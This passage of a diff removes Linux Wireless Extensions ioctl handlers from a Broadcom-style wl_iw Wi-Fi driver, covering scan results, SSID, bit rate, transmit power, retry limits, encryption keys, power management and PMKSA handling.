-- (CHSPEC_IS2G(bi->chanspec)) ? 
-- WF_CHAN_FACTOR_2_4_G : WF_CHAN_FACTOR_5_G);
-- iwe.u.freq.e = 6;
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_FREQ_LEN);
--
-- /* Channel quality */
-- iwe.cmd = IWEVQUAL;
-- iwe.u.qual.qual = rssi_to_qual(dtoh16(bi->RSSI));
-- iwe.u.qual.level = 0x100 + dtoh16(bi->RSSI);
-- iwe.u.qual.noise = 0x100 + bi->phy_noise;
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_QUAL_LEN);
--
-- /* WPA, WPA2, WPS, WAPI IEs */
-- wl_iw_handle_scanresults_ies(&event, end, info, bi);
--
-- /* Encryption */
-- iwe.cmd = SIOCGIWENCODE;
-- if (dtoh16(bi->capability) & DOT11_CAP_PRIVACY)
-- iwe.u.data.flags = IW_ENCODE_ENABLED | IW_ENCODE_NOKEY;
-- else
-- iwe.u.data.flags = IW_ENCODE_DISABLED;
-- iwe.u.data.length = 0;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)event);
--
-- /* Rates */
-- if (bi->rateset.count) {
-- value = event + IW_EV_LCP_LEN;
-- iwe.cmd = SIOCGIWRATE;
-- /* Those two flags are ignored... */
-- iwe.u.bitrate.fixed = iwe.u.bitrate.disabled = 0;
-- for (j = 0; j < bi->rateset.count && j < IW_MAX_BITRATES; j++) {
-- iwe.u.bitrate.value = (bi->rateset.rates[j] & 0x7f) * 500000;
-- value = IWE_STREAM_ADD_VALUE(info, event, value, end, &iwe,
-- IW_EV_PARAM_LEN);
-- }
-- event = value;
-- }
-- }
--
-- kfree(list);
--
-- dwrq->length = event - extra;
-- dwrq->flags = 0; /* todo */
--
-- return 0;
--}
--
--static int
--wl_iw_iscan_get_scan(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_scan_results_t *list;
-- struct iw_event iwe;
-- wl_bss_info_t *bi = NULL;
-- int ii, j;
-- int apcnt;
-- char *event = extra, *end = extra + dwrq->length, *value;
-- iscan_info_t *iscan = g_iscan;
-- iscan_buf_t * p_buf;
--
-- WL_TRACE(("%s: SIOCGIWSCAN\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- /* use backup if our thread is not successful */
-- if ((!iscan) || (iscan->sysioc_pid < 0)) {
-- return wl_iw_get_scan(dev, info, dwrq, extra);
-- }
--
-- /* 
Check for scan in progress */
-- if (iscan->iscan_state == ISCAN_STATE_SCANING)
-- return -EAGAIN;
--
-- apcnt = 0;
-- p_buf = iscan->list_hdr;
-- /* Get scan results */
-- while (p_buf != iscan->list_cur) {
-- list = &((wl_iscan_results_t*)p_buf->iscan_buf)->results;
--
-- if (list->version != WL_BSS_INFO_VERSION) {
-- WL_ERROR(("list->version %d != WL_BSS_INFO_VERSION\n", list->version));
-- }
--
-- bi = NULL;
-- for (ii = 0; ii < list->count && apcnt < IW_MAX_AP; apcnt++, ii++) {
-- bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
--
-- /* overflow check cover fields before wpa IEs */
-- if (event + ETHER_ADDR_LEN + bi->SSID_len + IW_EV_UINT_LEN + IW_EV_FREQ_LEN +
-- IW_EV_QUAL_LEN >= end)
-- return -E2BIG;
-- /* First entry must be the BSSID */
-- iwe.cmd = SIOCGIWAP;
-- iwe.u.ap_addr.sa_family = ARPHRD_ETHER;
-- memcpy(iwe.u.ap_addr.sa_data, &bi->BSSID, ETHER_ADDR_LEN);
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_ADDR_LEN);
--
-- /* SSID */
-- iwe.u.data.length = dtoh32(bi->SSID_len);
-- iwe.cmd = SIOCGIWESSID;
-- iwe.u.data.flags = 1;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, bi->SSID);
--
-- /* Mode */
-- if (dtoh16(bi->capability) & (DOT11_CAP_ESS | DOT11_CAP_IBSS)) {
-- iwe.cmd = SIOCGIWMODE;
-- if (dtoh16(bi->capability) & DOT11_CAP_ESS)
-- iwe.u.mode = IW_MODE_INFRA;
-- else
-- iwe.u.mode = IW_MODE_ADHOC;
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_UINT_LEN);
-- }
--
-- /* Channel */
-- iwe.cmd = SIOCGIWFREQ;
--
-- iwe.u.freq.m = wf_channel2mhz(CHSPEC_CHANNEL(bi->chanspec),
-- (CHSPEC_IS2G(bi->chanspec)) ? 
-- WF_CHAN_FACTOR_2_4_G : WF_CHAN_FACTOR_5_G);
-- iwe.u.freq.e = 6;
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_FREQ_LEN);
--
-- /* Channel quality */
-- iwe.cmd = IWEVQUAL;
-- iwe.u.qual.qual = rssi_to_qual(dtoh16(bi->RSSI));
-- iwe.u.qual.level = 0x100 + dtoh16(bi->RSSI);
-- iwe.u.qual.noise = 0x100 + bi->phy_noise;
-- event = IWE_STREAM_ADD_EVENT(info, event, end, &iwe, IW_EV_QUAL_LEN);
--
-- /* WPA, WPA2, WPS, WAPI IEs */
-- wl_iw_handle_scanresults_ies(&event, end, info, bi);
--
-- /* Encryption */
-- iwe.cmd = SIOCGIWENCODE;
-- if (dtoh16(bi->capability) & DOT11_CAP_PRIVACY)
-- iwe.u.data.flags = IW_ENCODE_ENABLED | IW_ENCODE_NOKEY;
-- else
-- iwe.u.data.flags = IW_ENCODE_DISABLED;
-- iwe.u.data.length = 0;
-- event = IWE_STREAM_ADD_POINT(info, event, end, &iwe, (char *)event);
--
-- /* Rates */
-- if (bi->rateset.count <= sizeof(bi->rateset.rates)) {
-- if (event + IW_MAX_BITRATES*IW_EV_PARAM_LEN >= end)
-- return -E2BIG;
--
-- value = event + IW_EV_LCP_LEN;
-- iwe.cmd = SIOCGIWRATE;
-- /* Those two flags are ignored... 
*/
-- iwe.u.bitrate.fixed = iwe.u.bitrate.disabled = 0;
-- for (j = 0; j < bi->rateset.count && j < IW_MAX_BITRATES; j++) {
-- iwe.u.bitrate.value = (bi->rateset.rates[j] & 0x7f) * 500000;
-- value = IWE_STREAM_ADD_VALUE(info, event, value, end, &iwe,
-- IW_EV_PARAM_LEN);
-- }
-- event = value;
-- }
-- }
-- p_buf = p_buf->next;
-- } /* while (p_buf) */
--
-- dwrq->length = event - extra;
-- dwrq->flags = 0; /* todo */
--
-- return 0;
--}
--
--#endif /* WIRELESS_EXT > 13 */
--
--
--static int
--wl_iw_set_essid(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wlc_ssid_t ssid;
-- int error;
--
-- WL_TRACE(("%s: SIOCSIWESSID\n", dev->name));
--
-- /* default Broadcast SSID */
-- memset(&ssid, 0, sizeof(ssid));
-- if (dwrq->length && extra) {
--#if WIRELESS_EXT > 20
-- ssid.SSID_len = MIN(sizeof(ssid.SSID), dwrq->length);
--#else
-- ssid.SSID_len = MIN(sizeof(ssid.SSID), dwrq->length-1);
--#endif
-- memcpy(ssid.SSID, extra, ssid.SSID_len);
-- ssid.SSID_len = htod32(ssid.SSID_len);
--
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_SSID, &ssid, sizeof(ssid))))
-- return error;
-- }
-- /* If essid null then it is "iwconfig essid off" command */
-- else {
-- scb_val_t scbval;
-- bzero(&scbval, sizeof(scb_val_t));
-- if ((error = dev_wlc_ioctl(dev, WLC_DISASSOC, &scbval, sizeof(scb_val_t))))
-- return error;
-- }
-- return 0;
--}
--
--static int
--wl_iw_get_essid(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wlc_ssid_t ssid;
-- int error;
--
-- WL_TRACE(("%s: SIOCGIWESSID\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_SSID, &ssid, sizeof(ssid)))) {
-- WL_ERROR(("Error getting the SSID\n"));
-- return error;
-- }
--
-- ssid.SSID_len = dtoh32(ssid.SSID_len);
--
-- /* Get the current SSID */
-- memcpy(extra, ssid.SSID, ssid.SSID_len);
--
-- dwrq->length = ssid.SSID_len;
--
-- dwrq->flags = 1; /* 
active */
--
-- return 0;
--}
--
--static int
--wl_iw_set_nick(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_iw_t *iw = IW_DEV_IF(dev);
-- WL_TRACE(("%s: SIOCSIWNICKN\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- /* Check the size of the string */
-- if (dwrq->length > sizeof(iw->nickname))
-- return -E2BIG;
--
-- memcpy(iw->nickname, extra, dwrq->length);
-- iw->nickname[dwrq->length - 1] = '\0';
--
-- return 0;
--}
--
--static int
--wl_iw_get_nick(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_iw_t *iw = IW_DEV_IF(dev);
-- WL_TRACE(("%s: SIOCGIWNICKN\n", dev->name));
--
-- if (!extra)
-- return -EINVAL;
--
-- strcpy(extra, iw->nickname);
-- dwrq->length = strlen(extra) + 1;
--
-- return 0;
--}
--
--static int wl_iw_set_rate(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- wl_rateset_t rateset;
-- int error, rate, i, error_bg, error_a;
--
-- WL_TRACE(("%s: SIOCSIWRATE\n", dev->name));
--
-- /* Get current rateset */
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_CURR_RATESET, &rateset, sizeof(rateset))))
-- return error;
--
-- rateset.count = dtoh32(rateset.count);
--
-- if (vwrq->value < 0) {
-- /* Select maximum rate */
-- rate = rateset.rates[rateset.count - 1] & 0x7f;
-- } else if (vwrq->value < rateset.count) {
-- /* Select rate by rateset index */
-- rate = rateset.rates[vwrq->value] & 0x7f;
-- } else {
-- /* Specified rate in bps */
-- rate = vwrq->value / 500000;
-- }
--
-- if (vwrq->fixed) {
-- /*
-- Set rate override,
-- Since the is a/b/g-blind, both a/bg_rate are enforced. 
-- */
-- error_bg = dev_wlc_intvar_set(dev, "bg_rate", rate);
-- error_a = dev_wlc_intvar_set(dev, "a_rate", rate);
--
-- if (error_bg && error_a)
-- return (error_bg | error_a);
-- } else {
-- /*
-- clear rate override
-- Since the is a/b/g-blind, both a/bg_rate are enforced.
-- */
-- /* 0 is for clearing rate override */
-- error_bg = dev_wlc_intvar_set(dev, "bg_rate", 0);
-- /* 0 is for clearing rate override */
-- error_a = dev_wlc_intvar_set(dev, "a_rate", 0);
--
-- if (error_bg && error_a)
-- return (error_bg | error_a);
--
-- /* Remove rates above selected rate */
-- for (i = 0; i < rateset.count; i++)
-- if ((rateset.rates[i] & 0x7f) > rate)
-- break;
-- rateset.count = htod32(i);
--
-- /* Set current rateset */
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_RATESET, &rateset, sizeof(rateset))))
-- return error;
-- }
--
-- return 0;
--}
--
--static int wl_iw_get_rate(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, rate;
--
-- WL_TRACE(("%s: SIOCGIWRATE\n", dev->name));
--
-- /* Report the current tx rate */
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_RATE, &rate, sizeof(rate))))
-- return error;
-- rate = dtoh32(rate);
-- vwrq->value = rate * 500000;
--
-- return 0;
--}
--
--static int
--wl_iw_set_rts(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, rts;
--
-- WL_TRACE(("%s: SIOCSIWRTS\n", dev->name));
--
-- if (vwrq->disabled)
-- rts = DOT11_DEFAULT_RTS_LEN;
-- else if (vwrq->value < 0 || vwrq->value > DOT11_DEFAULT_RTS_LEN)
-- return -EINVAL;
-- else
-- rts = vwrq->value;
--
-- if ((error = dev_wlc_intvar_set(dev, "rtsthresh", rts)))
-- return error;
--
-- return 0;
--}
--
--static int
--wl_iw_get_rts(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, rts;
--
-- WL_TRACE(("%s: SIOCGIWRTS\n", dev->name));
--
-- if ((error = 
dev_wlc_intvar_get(dev, "rtsthresh", &rts)))
-- return error;
--
-- vwrq->value = rts;
-- vwrq->disabled = (rts >= DOT11_DEFAULT_RTS_LEN);
-- vwrq->fixed = 1;
--
-- return 0;
--}
--
--static int
--wl_iw_set_frag(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, frag;
--
-- WL_TRACE(("%s: SIOCSIWFRAG\n", dev->name));
--
-- if (vwrq->disabled)
-- frag = DOT11_DEFAULT_FRAG_LEN;
-- else if (vwrq->value < 0 || vwrq->value > DOT11_DEFAULT_FRAG_LEN)
-- return -EINVAL;
-- else
-- frag = vwrq->value;
--
-- if ((error = dev_wlc_intvar_set(dev, "fragthresh", frag)))
-- return error;
--
-- return 0;
--}
--
--static int
--wl_iw_get_frag(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, fragthreshold;
--
-- WL_TRACE(("%s: SIOCGIWFRAG\n", dev->name));
--
-- if ((error = dev_wlc_intvar_get(dev, "fragthresh", &fragthreshold)))
-- return error;
--
-- vwrq->value = fragthreshold;
-- vwrq->disabled = (fragthreshold >= DOT11_DEFAULT_FRAG_LEN);
-- vwrq->fixed = 1;
--
-- return 0;
--}
--
--static int
--wl_iw_set_txpow(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, disable;
-- uint16 txpwrmw;
-- WL_TRACE(("%s: SIOCSIWTXPOW\n", dev->name));
--
-- /* Make sure radio is off or on as far as software is concerned */
-- disable = vwrq->disabled ? 
WL_RADIO_SW_DISABLE : 0;
-- disable += WL_RADIO_SW_DISABLE << 16;
--
-- disable = htod32(disable);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_RADIO, &disable, sizeof(disable))))
-- return error;
--
-- /* If Radio is off, nothing more to do */
-- if (disable & WL_RADIO_SW_DISABLE)
-- return 0;
--
-- /* Only handle mW */
-- if (!(vwrq->flags & IW_TXPOW_MWATT))
-- return -EINVAL;
--
-- /* Value < 0 means just "on" or "off" */
-- if (vwrq->value < 0)
-- return 0;
--
-- if (vwrq->value > 0xffff) txpwrmw = 0xffff;
-- else txpwrmw = (uint16)vwrq->value;
--
--
-- error = dev_wlc_intvar_set(dev, "qtxpower", (int)(bcm_mw_to_qdbm(txpwrmw)));
-- return error;
--}
--
--static int
--wl_iw_get_txpow(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, disable, txpwrdbm;
-- uint8 result;
--
-- WL_TRACE(("%s: SIOCGIWTXPOW\n", dev->name));
--
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_RADIO, &disable, sizeof(disable))) ||
-- (error = dev_wlc_intvar_get(dev, "qtxpower", &txpwrdbm)))
-- return error;
--
-- disable = dtoh32(disable);
-- result = (uint8)(txpwrdbm & ~WL_TXPWR_OVERRIDE);
-- vwrq->value = (int32)bcm_qdbm_to_mw(result);
-- vwrq->fixed = 0;
-- vwrq->disabled = (disable & (WL_RADIO_SW_DISABLE | WL_RADIO_HW_DISABLE)) ? 
1 : 0;
-- vwrq->flags = IW_TXPOW_MWATT;
--
-- return 0;
--}
--
--#if WIRELESS_EXT > 10
--static int
--wl_iw_set_retry(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, lrl, srl;
--
-- WL_TRACE(("%s: SIOCSIWRETRY\n", dev->name));
--
-- /* Do not handle "off" or "lifetime" */
-- if (vwrq->disabled || (vwrq->flags & IW_RETRY_LIFETIME))
-- return -EINVAL;
--
-- /* Handle "[min|max] limit" */
-- if (vwrq->flags & IW_RETRY_LIMIT) {
-- /* "max limit" or just "limit" */
--#if WIRELESS_EXT > 20
-- if ((vwrq->flags & IW_RETRY_LONG) ||(vwrq->flags & IW_RETRY_MAX) ||
-- !((vwrq->flags & IW_RETRY_SHORT) || (vwrq->flags & IW_RETRY_MIN))) {
--#else
-- if ((vwrq->flags & IW_RETRY_MAX) || !(vwrq->flags & IW_RETRY_MIN)) {
--#endif /* WIRELESS_EXT > 20 */
--
-- lrl = htod32(vwrq->value);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_LRL, &lrl, sizeof(lrl))))
-- return error;
-- }
-- /* "min limit" or just "limit" */
--#if WIRELESS_EXT > 20
-- if ((vwrq->flags & IW_RETRY_SHORT) ||(vwrq->flags & IW_RETRY_MIN) ||
-- !((vwrq->flags & IW_RETRY_LONG) || (vwrq->flags & IW_RETRY_MAX))) {
--#else
-- if ((vwrq->flags & IW_RETRY_MIN) || !(vwrq->flags & IW_RETRY_MAX)) {
--#endif /* WIRELESS_EXT > 20 */
--
-- srl = htod32(vwrq->value);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_SRL, &srl, sizeof(srl))))
-- return error;
-- }
-- }
--
-- return 0;
--}
--
--static int
--wl_iw_get_retry(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, lrl, srl;
--
-- WL_TRACE(("%s: SIOCGIWRETRY\n", dev->name));
--
-- vwrq->disabled = 0; /* Can't be disabled */
--
-- /* Do not handle lifetime queries */
-- if ((vwrq->flags & IW_RETRY_TYPE) == IW_RETRY_LIFETIME)
-- return -EINVAL;
--
-- /* Get retry limits */
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_LRL, &lrl, sizeof(lrl))) ||
-- (error = dev_wlc_ioctl(dev, WLC_GET_SRL, &srl, sizeof(srl))))
-- return error;
--
-- lrl =
dtoh32(lrl);
-- srl = dtoh32(srl);
--
-- /* Note : by default, display the min retry number */
-- if (vwrq->flags & IW_RETRY_MAX) {
-- vwrq->flags = IW_RETRY_LIMIT | IW_RETRY_MAX;
-- vwrq->value = lrl;
-- } else {
-- vwrq->flags = IW_RETRY_LIMIT;
-- vwrq->value = srl;
-- if (srl != lrl)
-- vwrq->flags |= IW_RETRY_MIN;
-- }
--
-- return 0;
--}
--#endif /* WIRELESS_EXT > 10 */
--
--static int
--wl_iw_set_encode(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_wsec_key_t key;
-- int error, val, wsec;
--
-- WL_TRACE(("%s: SIOCSIWENCODE\n", dev->name));
--
-- memset(&key, 0, sizeof(key));
--
-- if ((dwrq->flags & IW_ENCODE_INDEX) == 0) {
-- /* Find the current key */
-- for (key.index = 0; key.index < DOT11_MAX_DEFAULT_KEYS; key.index++) {
-- val = htod32(key.index);
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_KEY_PRIMARY, &val, sizeof(val))))
-- return error;
-- val = dtoh32(val);
-- if (val)
-- break;
-- }
-- /* Default to 0 */
-- if (key.index == DOT11_MAX_DEFAULT_KEYS)
-- key.index = 0;
-- } else {
-- key.index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
-- if (key.index >= DOT11_MAX_DEFAULT_KEYS)
-- return -EINVAL;
-- }
--
-- /* Interpret "off" to mean no encryption */
-- wsec = (dwrq->flags & IW_ENCODE_DISABLED) ?
0 : WEP_ENABLED;
--
-- if ((error = dev_wlc_intvar_set(dev, "wsec", wsec)))
-- return error;
--
-- /* Old API used to pass a NULL pointer instead of IW_ENCODE_NOKEY */
-- if (!extra || !dwrq->length || (dwrq->flags & IW_ENCODE_NOKEY)) {
-- /* Just select a new current key */
-- val = htod32(key.index);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_KEY_PRIMARY, &val, sizeof(val))))
-- return error;
-- } else {
-- key.len = dwrq->length;
--
-- if (dwrq->length > sizeof(key.data))
-- return -EINVAL;
--
-- memcpy(key.data, extra, dwrq->length);
--
-- key.flags = WL_PRIMARY_KEY;
-- switch (key.len) {
-- case WEP1_KEY_SIZE:
-- key.algo = CRYPTO_ALGO_WEP1;
-- break;
-- case WEP128_KEY_SIZE:
-- key.algo = CRYPTO_ALGO_WEP128;
-- break;
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 14)
-- case TKIP_KEY_SIZE:
-- key.algo = CRYPTO_ALGO_TKIP;
-- break;
--#endif
-- case AES_KEY_SIZE:
-- key.algo = CRYPTO_ALGO_AES_CCM;
-- break;
-- default:
-- return -EINVAL;
-- }
--
-- /* Set the new key/index */
-- swap_key_from_BE(&key);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_KEY, &key, sizeof(key))))
-- return error;
-- }
--
-- /* Interpret "restricted" to mean shared key authentication */
-- val = (dwrq->flags & IW_ENCODE_RESTRICTED) ?
1 : 0;
-- val = htod32(val);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_AUTH, &val, sizeof(val))))
-- return error;
--
-- return 0;
--}
--
--static int
--wl_iw_get_encode(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_wsec_key_t key;
-- int error, val, wsec, auth;
--
-- WL_TRACE(("%s: SIOCGIWENCODE\n", dev->name));
--
-- /* assure default values of zero for things we don't touch */
-- bzero(&key, sizeof(wl_wsec_key_t));
--
-- if ((dwrq->flags & IW_ENCODE_INDEX) == 0) {
-- /* Find the current key */
-- for (key.index = 0; key.index < DOT11_MAX_DEFAULT_KEYS; key.index++) {
-- val = key.index;
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_KEY_PRIMARY, &val, sizeof(val))))
-- return error;
-- val = dtoh32(val);
-- if (val)
-- break;
-- }
-- } else
-- key.index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
--
-- if (key.index >= DOT11_MAX_DEFAULT_KEYS)
-- key.index = 0;
--
-- /* Get info */
--
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_WSEC, &wsec, sizeof(wsec))) ||
-- (error = dev_wlc_ioctl(dev, WLC_GET_AUTH, &auth, sizeof(auth))))
-- return error;
--
-- swap_key_to_BE(&key);
--
-- wsec = dtoh32(wsec);
-- auth = dtoh32(auth);
-- /* Get key length */
-- dwrq->length = MIN(IW_ENCODING_TOKEN_MAX, key.len);
--
-- /* Get flags */
-- dwrq->flags = key.index + 1;
-- if (!(wsec & (WEP_ENABLED | TKIP_ENABLED | AES_ENABLED))) {
-- /* Interpret "off" to mean no encryption */
-- dwrq->flags |= IW_ENCODE_DISABLED;
-- }
-- if (auth) {
-- /* Interpret "restricted" to mean shared key authentication */
-- dwrq->flags |= IW_ENCODE_RESTRICTED;
-- }
--
-- /* Get key */
-- if (dwrq->length && extra)
-- memcpy(extra, key.data, dwrq->length);
--
-- return 0;
--}
--
--static int
--wl_iw_set_power(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, pm;
--
-- WL_TRACE(("%s: SIOCSIWPOWER\n", dev->name));
--
-- pm = vwrq->disabled ?
PM_OFF : PM_MAX;
--
-- pm = htod32(pm);
-- if ((error = dev_wlc_ioctl(dev, WLC_SET_PM, &pm, sizeof(pm))))
-- return error;
--
-- return 0;
--}
--
--static int
--wl_iw_get_power(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error, pm;
--
-- WL_TRACE(("%s: SIOCGIWPOWER\n", dev->name));
--
-- if ((error = dev_wlc_ioctl(dev, WLC_GET_PM, &pm, sizeof(pm))))
-- return error;
--
-- pm = dtoh32(pm);
-- vwrq->disabled = pm ? 0 : 1;
-- vwrq->flags = IW_POWER_ALL_R;
--
-- return 0;
--}
--
--#if WIRELESS_EXT > 17
--static int
--wl_iw_set_wpaie(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *iwp,
-- char *extra
--)
--{
-- dev_wlc_bufvar_set(dev, "wpaie", extra, iwp->length);
--
-- return 0;
--}
--
--static int
--wl_iw_get_wpaie(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *iwp,
-- char *extra
--)
--{
-- WL_TRACE(("%s: SIOCGIWGENIE\n", dev->name));
-- iwp->length = 64;
-- dev_wlc_bufvar_get(dev, "wpaie", extra, iwp->length);
-- return 0;
--}
--
--static int
--wl_iw_set_encodeext(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_point *dwrq,
-- char *extra
--)
--{
-- wl_wsec_key_t key;
-- int error;
-- struct iw_encode_ext *iwe;
--
-- WL_TRACE(("%s: SIOCSIWENCODEEXT\n", dev->name));
--
-- memset(&key, 0, sizeof(key));
-- iwe = (struct iw_encode_ext *)extra;
--
-- /* disable encryption completely */
-- if (dwrq->flags & IW_ENCODE_DISABLED) {
--
-- }
--
-- /* get the key index */
-- key.index = 0;
-- if (dwrq->flags & IW_ENCODE_INDEX)
-- key.index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
--
-- key.len = iwe->key_len;
--
-- /* Instead of bcast for ea address for default wep keys, driver needs it to be Null */
-- if (!ETHER_ISMULTI(iwe->addr.sa_data))
-- bcopy((void *)&iwe->addr.sa_data, (char *)&key.ea, ETHER_ADDR_LEN);
--
-- /* check for key index change */
-- if (key.len == 0) {
-- if (iwe->ext_flags &
IW_ENCODE_EXT_SET_TX_KEY) {
-- WL_WSEC(("Changing the the primary Key to %d\n", key.index));
-- /* change the key index .... */
-- key.index = htod32(key.index);
-- error = dev_wlc_ioctl(dev, WLC_SET_KEY_PRIMARY,
-- &key.index, sizeof(key.index));
-- if (error)
-- return error;
-- }
-- /* key delete */
-- else {
-- swap_key_from_BE(&key);
-- error = dev_wlc_ioctl(dev, WLC_SET_KEY, &key, sizeof(key));
-- if (error)
-- return error;
-- }
-- }
-- /* This case is used to allow an external 802.1x supplicant
-- * to pass the PMK to the in-driver supplicant for use in
-- * the 4-way handshake.
-- */
-- else if (iwe->alg == IW_ENCODE_ALG_PMK) {
-- int j;
-- wsec_pmk_t pmk;
-- char keystring[WSEC_MAX_PSK_LEN + 1];
-- char* charptr = keystring;
-- uint len;
--
-- /* copy the raw hex key to the appropriate format */
-- for (j = 0; j < (WSEC_MAX_PSK_LEN / 2); j++) {
-- sprintf(charptr, "%02x", iwe->key[j]);
-- charptr += 2;
-- }
-- len = strlen(keystring);
-- pmk.key_len = htod16(len);
-- bcopy(keystring, pmk.key, len);
-- pmk.flags = htod16(WSEC_PASSPHRASE);
--
-- error = dev_wlc_ioctl(dev, WLC_SET_WSEC_PMK, &pmk, sizeof(pmk));
-- if (error)
-- return error;
-- }
--
-- else {
-- if (iwe->key_len > sizeof(key.data))
-- return -EINVAL;
--
-- WL_WSEC(("Setting the key index %d\n", key.index));
-- if (iwe->ext_flags & IW_ENCODE_EXT_SET_TX_KEY) {
-- WL_WSEC(("key is a Primary Key\n"));
-- key.flags = WL_PRIMARY_KEY;
-- }
--
-- bcopy((void *)iwe->key, key.data, iwe->key_len);
--
-- if (iwe->alg == IW_ENCODE_ALG_TKIP) {
-- uint8 keybuf[8];
-- bcopy(&key.data[24], keybuf, sizeof(keybuf));
-- bcopy(&key.data[16], &key.data[24], sizeof(keybuf));
-- bcopy(keybuf, &key.data[16], sizeof(keybuf));
-- }
--
-- /* rx iv */
-- if (iwe->ext_flags & IW_ENCODE_EXT_RX_SEQ_VALID) {
-- uchar *ivptr;
-- ivptr = (uchar *)iwe->rx_seq;
-- key.rxiv.hi = (ivptr[5] << 24) | (ivptr[4] << 16) |
-- (ivptr[3] << 8) | ivptr[2];
-- key.rxiv.lo = (ivptr[1] << 8) | ivptr[0];
-- key.iv_initialized = TRUE;
-- }
--
-- switch (iwe->alg) {
-- case IW_ENCODE_ALG_NONE:
-- key.algo = CRYPTO_ALGO_OFF;
-- break;
-- case IW_ENCODE_ALG_WEP:
-- if (iwe->key_len == WEP1_KEY_SIZE)
-- key.algo = CRYPTO_ALGO_WEP1;
-- else
-- key.algo = CRYPTO_ALGO_WEP128;
-- break;
-- case IW_ENCODE_ALG_TKIP:
-- key.algo = CRYPTO_ALGO_TKIP;
-- break;
-- case IW_ENCODE_ALG_CCMP:
-- key.algo = CRYPTO_ALGO_AES_CCM;
-- break;
-- default:
-- break;
-- }
-- swap_key_from_BE(&key);
--
-- dhd_wait_pend8021x(dev);
--
-- error = dev_wlc_ioctl(dev, WLC_SET_KEY, &key, sizeof(key));
-- if (error)
-- return error;
-- }
-- return 0;
--}
--
--
--#if WIRELESS_EXT > 17
--struct {
-- pmkid_list_t pmkids;
-- pmkid_t foo[MAXPMKID-1];
--} pmkid_list;
--static int
--wl_iw_set_pmksa(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- struct iw_pmksa *iwpmksa;
-- uint i;
-- char eabuf[ETHER_ADDR_STR_LEN];
-- pmkid_t * pmkid_array = pmkid_list.pmkids.pmkid;
--
-- WL_TRACE(("%s: SIOCSIWPMKSA\n", dev->name));
-- iwpmksa = (struct iw_pmksa *)extra;
-- bzero((char *)eabuf, ETHER_ADDR_STR_LEN);
-- if (iwpmksa->cmd == IW_PMKSA_FLUSH) {
-- WL_TRACE(("wl_iw_set_pmksa - IW_PMKSA_FLUSH\n"));
-- bzero((char *)&pmkid_list, sizeof(pmkid_list));
-- }
-- if (iwpmksa->cmd == IW_PMKSA_REMOVE) {
